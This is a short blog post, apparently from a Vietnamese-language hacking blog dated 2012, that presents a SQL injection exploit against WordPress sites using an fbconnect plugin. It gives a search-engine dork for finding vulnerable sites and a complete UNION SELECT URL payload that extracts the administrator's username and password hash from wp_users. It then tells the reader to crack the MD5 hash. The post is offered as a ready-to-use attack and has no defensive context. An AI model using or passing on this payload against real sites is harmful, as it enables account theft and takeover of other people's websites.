Trang chủ
»
SQL Injection
» WordPress Blog Exploit - SQL Injection
15 thg 6, 2012
WordPress Blog Exploit - SQL Injection
Dork: inurl:"fbconnect_action=myhome"
You will be get such info of admin on page

Just change this part of URL :
?fbconnect_action=myhome&userid=
With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
Now You will be get Username and Password of Admin

Than Just Encrypt Password In any MD5 Cracker
Không có nhận xét nào:
Đăng nhận xét